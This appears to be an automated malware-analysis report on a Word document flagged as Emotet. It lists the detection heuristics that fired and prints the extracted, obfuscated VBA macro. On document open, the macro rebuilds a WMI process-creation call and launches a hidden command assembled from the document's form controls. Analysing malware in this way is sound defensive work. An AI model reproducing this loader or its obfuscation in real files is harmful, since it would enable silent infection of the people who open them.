Verdict: MALICIOUS
Risk score: 172

Heuristics (7)

- ClamAV: Doc.Malware.Emotet-7540219-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Emotet-7540219-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- GetObject call (high, OLE_VBA_GETOBJ). Matched line in script: `Set Afomearpyrlb = GetObject(Vshtocor)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: `Private Sub Document_open()`
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11139 bytes |

SHA-256: e27417742d7119688d67fc189fe3abeeca8bc8bb5082e13849168b82b627a447

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 205 of 317 identifiers look randomly generated (e.g. 'Etwprzltkyrbp'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Rncwejxkc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Iiyvvjoo
End Sub
Attribute VB_Name = "Whaeodtqkqi"
Attribute VB_Base = "0{52D0F05A-089C-4C08-9B1B-AB764DB4D7B5}{36B4AEC5-77EA-4BAB-AC54-D80C3EA04A94}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Aplhseob"
Function Yenwuidyxwz()
Do While Jmgtmxgu = 9875
Do While Okladkfofrymd = 34
Fvatlefspdlgu = Cos(8 + CStr(750))
Loop
Do While Nfotlpltbvw = 123
Kewjjwhbf = Vjswwrelcoet
Khuczxoeyi = 3253
Loop
Do While Cwyfohevy = 667
Owjrlxrfkyzzo = CDbl(324)
Gceqkjkqphnwa = Int(496)
Loop
Do While Clikffpgdhh = 2342
Hcxjsobb = CInt(Soegujyar)
Loop
Do While Woqdhtrwbidhj = 3247
Jdelvnkcpwa = Sgn(713)
Xegpsekngfku = CByte(Qzoguxhzv + Oimmbhguw)
Loop
Loop
Bhmfieewqmax = ChrW(wdKeyP)
Do While Uaufrffcie = 9875
Do While Hyhfzjzzj = 34
Ztebuipda = Cos(8 + CStr(750))
Loop
Do While Ijpugstoh = 123
Sxbpmdwclzvvu = Elutaeeapx
Cggvsldah = 3253
Loop
Do While Vlhyqgmou = 667
Nitntrnwlswz = CDbl(324)
Fedjqleegyht = Int(496)
Loop
Do While Ucjvvitybes = 2342
Lomzmndlcj = CInt(Xpjbvgzk)
Loop
Do While Iibdlchc = 3247
Eytqtzufddr = Sgn(713)
Rysjwgysc = CByte(Fdxjcadzkn + Wtivlugwkqeke)
Loop
Loop
Yzofkzbu = Bhmfieewqmax + Whaeodtqkqi.Ekqdonwu + Whaeodtqkqi.Wnbyoebd
Do While Qnfrughmtanf = 9875
Do While Wnrtcnbetzjp = 34
Kzrnucvavp = Cos(8 + CStr(750))
Loop
Do While Oevffomw = 123
Ctgutmtgied = Tjzkswws
Zzxinuudhjvx = 3253
Loop
Do While Aiihpgvar = 667
Wfetaewz = CDbl(324)
Vvdflnbwn = Int(496)
Loop
Do While Lskjnodvyzivg = 2342
Qkgezxyafnf = CInt(Stddwfln)
Loop
Do While Mptebhmzxo = 3247
Rpjgynrewinzc = Sgn(713)
Ezagbvauogtw = CByte(Nimgvcouphxv + Dctcwliawi)
Loop
Loop
Ctnwawndbnwwg = Split(Yzofkzbu + LTrim(LTrim(Whaeodtqkqi.Zazqvyncyowi. _
Tag)), ",,,,sdf7&&jsad,,,")
Do While Lmwfcmwjdvx = 9875
Do While Rborgbgodrg = 34
Nvlzgssowbrl = Cos(8 + CStr(750))
Loop
Do While Aftmqgvtudj = 123
Daiuqzjz = Doeqcuzwfsmgi
Pzxtbipfs = 3253
Loop
Do While Ogaleqyhpym = 667
Yugeiowrypbz = CDbl(324)
Apojmbogs = Int(496)
Loop
Do While Owibtgcjfvgc = 2342
Etwprzltkyrbp = CInt(Erbkkuroqfi)
Loop
Do While Fjtncmihrrb = 3247
Uljkrrcvb = Sgn(713)
Rbbmfgkjb = CByte(Aedzcrgmazn + Fegnqvuegovbk)
Loop
Loop
Yenwuidyxwz = Zlcfvwfxnhb + Join(Ctnwawndbnwwg, "") + Zlcfvwfxnhb
Do While Jhbqjhfftekb = 9875
Do While Vvdulhuz = 34
Kiirqgyi = Cos(8 + CStr(750))
Loop
Do While Ogjwzpfdphryb = 123
Zpwvibkf = Bznonfcsb
Mgvvbqjvjlg = 3253
Loop
Do While Rqcmaxebirx = 667
Obbpgaymmjbz = CDbl(324)
Ajrtuewxxd = Int(496)
Loop
Do While Dlmeoxfjciuu = 2342
Weehanumd = CInt(Yclwqexzown)
Loop
Do While Uduwispxoo = 3247
Tpcbxqhunqvt = Sgn(713)
Dwuqkievnx = CByte(Elcskodexpvyr + Fvdiajwot)
Loop
Loop
End Function
Function Iiyvvjoo()
a = ",,,,sdf7&&jsad,,,in,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,m,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,gm,,,,sdf7&&jsad,,,t,,,,sdf7&&jsad,,," + ChrW(wdKeyS) + ",,,,sdf7&&jsad,,,:w,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,i,,,,sdf7&&jsad,,,n3,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,2_" + Whaeodtqkqi.Cvavxyjtjdn + "r,,,,sdf7&&jsad,,,oces,,,,sdf7&&jsad,,,s"
Do While Iobxqiolgca = 9875
Do While Aeqncvcf = 34
Syhapnfbz = Cos(8 + CStr(750))
Loop
Do While Gycatwfk = 123
Ofkfduekdki = Iyihyxabb
Tgomizwvsqdtw = 3253
Loop
Do While Tbqvuswrtc = 667
Hmfpmolmxgr = CDbl(324)
Nnsqffmm = Int(496)
Loop
Do While Ykfwgxpuk = 2342
Pinbqelipm = CInt(Shfeanxybvh)
Loop
Do While Hsfphlhds = 3247
Fpoaaewro = Sgn(713)
Pasogmzitbg = CByte(Lfthbclzja + Zwxxyqritd)
Loop
Loop
q = ",,,,sdf7&&jsad,,,"
Do While Zzklipkkwt = 9875
Do While Efqweqoezhxjf = 34
Gwbjgjtczyhbp = Cos(8 + CStr(750))
Loop
Do While Yvcvzxieycukk = 123
Bggtenvk = Kdrxwpyzcjc
Dyxscglyjk = 3253
Loop
Do While Bvwzjckkgourg = 667
Wkiiatwcuhu = CDbl(324)
Fqbsuavt = Int(496)
Loop
Do While Sgrxcpeglatpn = 2342
Wdesbsoj = CInt(Pmbwfhttl)
Loop
Do While Iwtnqbjs = 3247
Daqxxqbagdx = Sgn(713)
Nccjgszvckao = CByte(Flrfqyomml + Qstemezeg)
Loop
Loop
Myeyqpnmll = Split(",,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,w,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,,,,,,sdf7&&jsad,,," + a, q)
Do While Gqlxiiybbzyz = 9875
Do While Smcidbwdktmzu = 34
Rpabpyhquuj = Cos(8 + CStr(750))
Loop
Do While Mbdszwwlhhqu = 123
Grljoqlk = Ybzlvhnugerjp
Ylfkhkhtwazjl = 3253
Loop
Do While Hbqguywk = 667
Twnskxbrjqfgz = CDbl(324)
Rhdlwybycwp = Int(496)
Loop
Do While Zabapknntb = 2342
Xrbfybbn = CInt(Qtztarxl)
Loop
Do While Erriofrppzxg = 3247
Ygatdvoer = Sgn(713)
Havkvqifry = CByte(Sqtkmytf + Rvtrdhzg)
Loop
Loop
Vshtocor = Join(Myeyqpnmll, "")
Do While Cnzqbzydtler = 9875
Do While Bcvitston = 34
Qynmxhbrlqp = Cos(8 + CStr(750))
Loop
Do While Avxlwlidgd = 123
Skceanawbkakq = Davplymi
Hsbvkkvbnewyn = 3253
Loop
Do While Phgqvmuz = 667
Dkoaafcfi = CDbl(324)
Zarzfjdrgfnl = Int(496)
Loop
Do While Qfrbinttqgaga = 2342
Userjqgpqpdrh = CInt(Qzdejakdzfafk)
Loop
Do While Zjqsmmitbfjqb = 3247
Vlrrqbcvd = Sgn(713)
Pemikwerqu = CByte(Onifbyajjru + Osuxwnntdwd)
Loop
Loop
Set Afomearpyrlb = GetObject(Vshtocor)
Do While Shrluiee = 9875
Do While Rgitsbjecx = 34
Evsqamteve = Cos(8 + CStr(750))
Loop
Do While Glvrckol = 123
Lufgtnnovsi = Wteirkrp
Emhfscsjjqpj = 3253
Loop
Do While Ttgrhjuuzi = 667
Xbwaeyycbtmiv = CDbl(324)
Izqnmwto = Int(496)
Loop
Do While Aidxkmzf = 2342
Qnilrlujz = CInt(Vvgmujunbenxw)
Loop
Do While Verhncbhmvr = 3247
Abjorfemxlpde = Sgn(713)
Acplhaqqsstv = CByte(Tqddynzuygr + Xsbdikig)
Loop
Loop
Wgyesebfjld = Vshtocor + ChrW(wdKeyS) + Whaeodtqkqi.Mimxrfhqw.ControlTipText$ + Whaeodtqkqi.Rniyztrqdcmv.ControlTipText
Do While Dbamuqzza = 9875
Do While Ewhdokrcl = 34
Wvjppyna = Cos(8 + CStr(750))
Loop
Do While Ekwewauj = 123
Zvftcirvebz = Beeceaal
Gamkyskx = 3253
Loop
Do While Ncaqpnghswib = 667
Vzrxpjrbz = CDbl(324)
Tqxsdtegxpydo = Int(496)
Loop
Do While Uttdremepya = 2342
Jamdgrwxi = CInt(Ceuqsxwdkyp)
Loop
Do While Wcugliucg = 3247
Wdvxwqulffanj = Sgn(713)
Scxcjucehd = CByte(Laulwhxtpby + Edtcvpkkyqrf)
Loop
Loop
Owaqkpxm = Wgyesebfjld + Whaeodtqkqi.Cvavxyjtjdn
Do While Ljorxlimtlxuz = 9875
Do While Zuezgeuxneg = 34
Mdhexyjstwp = Cos(8 + CStr(750))
Loop
Do While Rnrdophhay = 123
Isrlbmqk = Qesxbsyg
Axngfjprthl = 3253
Loop
Do While Bofrgrjyoqq = 667
Kroojtaccle = CDbl(324)
Swzrlomor = Int(496)
Loop
Do While Arooqlgwjszy = 2342
Ysdnydaga = CInt(Yxeclztjso)
Loop
Do While Llreibnty = 3247
Nwiasfuuqpc = Sgn(713)
Cuysgpjqgms = CByte(Ysengobkr + Yaeytbqj)
Loop
Loop
Set Iiyvvjoo = GetObject(Owaqkpxm)
Do While Bqbthtqnot = 9875
Do While Odfggsslgmn = 34
Hiioamosl = Cos(8 + CStr(750))
Loop
Do While Peagqkngtz = 123
Bcpxrddocrl = Iyngtwdawr
Lvvyhpipugm = 3253
Loop
Do While Woiogxtavhm = 667
Acnnfkngfihqv = CDbl(324)
Kqclcrwi = Int(496)
Loop
Do While Puiqqojxio = 2342
Hbcxiqga = CInt(Vpqffayhdu)
Loop
Do While Ppeppuys = 3247
Xiibjejgbuo = Sgn(713)
Saliizakljglm = CByte(Amcfyhshwert + Sxnlqlpelqsmc)
Loop
Loop
Iiyvvjoo. _
showwindow = False
Do While Ogouyughtmzdq = 9875
Do While Kyubuipyillsn = 34
Dooseguvckgb = Cos(8 + CStr(750))
Loop
Do While Vqwenkqbwany = 123
Jmbtncilp = Ppdrrogvem
Oajacrnefxo = 3253
Loop
Do While Inosmkbyuxv = 667
Flhdetoxns = CDbl(324)
Gtbtesas = Int(496)
Loop
Do While Bsdsctqtc = 2342
Rmbxbtvxsvu = CInt(Fqafpfuujwk)
Loop
Do While Lqvhtppmogzwc = 3247
Vjnghmmls = Sgn(713)
Xttiqqic = CByte(Bkbevdrja + Hozzjeinzec)
Loop
Loop
Do While Afomearpyrlb.Create(n & Yenwuidyxwz, Qzptbycrcp, Iiyvvjoo, Ezafznchyx)
Loop
Do While Ezroijkdj = 9875
Do While Ornkjlpivhajl = 34
Xmkgwtjpucy = Cos(8 + CStr(750))
Loop
Do While Bmkcefgvmfc = 123
Afydpgdulxtc = Fbthkabh
Yfgeslhhtdsdr = 3253
Loop
Do While Shtporzxcb = 667
Xsmrswbfkzzb = CDbl(324)
Ljdkbkcvrsh = Int(496)
Loop
Do While Gyhedyskpgla = 2342
Kcsirqygqur = CInt(Qbaukbcuhc)
Loop
Do While Dgfvcrkvustyk = 3247
Vainmdpc = Sgn(713)
Mbyeudzxlok = CByte(Ocheoxibjt + Uypjsndwg)
Loop
Loop
End Function